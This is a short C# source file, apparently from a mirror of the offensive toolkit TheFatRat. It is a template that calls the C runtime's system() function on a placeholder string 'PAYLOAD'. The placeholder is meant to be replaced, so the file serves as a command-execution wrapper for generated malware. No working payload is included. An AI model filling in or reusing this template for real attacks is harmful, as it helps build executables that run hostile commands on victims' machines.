0
0
Fork 0
mirror of https://github.com/Screetsec/TheFatRat.git synced 2023-12-14 02:02:58 +01:00
TheFatRat/tools/prog.cs
Edo -maland- 8024155904 News
2016-09-14 00:38:01 +07:00

15 lines
225 B
C#

// C#
using System.Runtime.InteropServices;
namespace pshcmd
{
public class CMD
{
[DllImport("msvcrt.dll")]
public static extern int system(string cmd);
public static void Main()
{
system("PAYLOAD");
}
}
}